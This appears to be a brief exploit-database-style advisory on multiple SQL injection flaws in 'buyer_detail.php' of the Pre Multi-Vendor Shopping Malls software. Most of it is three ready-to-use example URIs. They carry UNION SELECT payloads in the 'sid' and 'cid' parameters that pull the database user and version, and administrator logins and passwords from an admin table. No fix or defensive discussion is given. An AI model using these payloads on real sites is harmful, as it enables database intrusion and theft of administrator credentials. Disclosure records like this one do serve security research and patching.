Pre Multi-Vendor Shopping Malls 'buyer_detail.php' Multiple SQL Injection Vulnerabilities

Pre Multi-Vendor Shopping Malls 'buyer_detail.php' Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
http://www.example.com/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
http://www.example.com/[path]/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--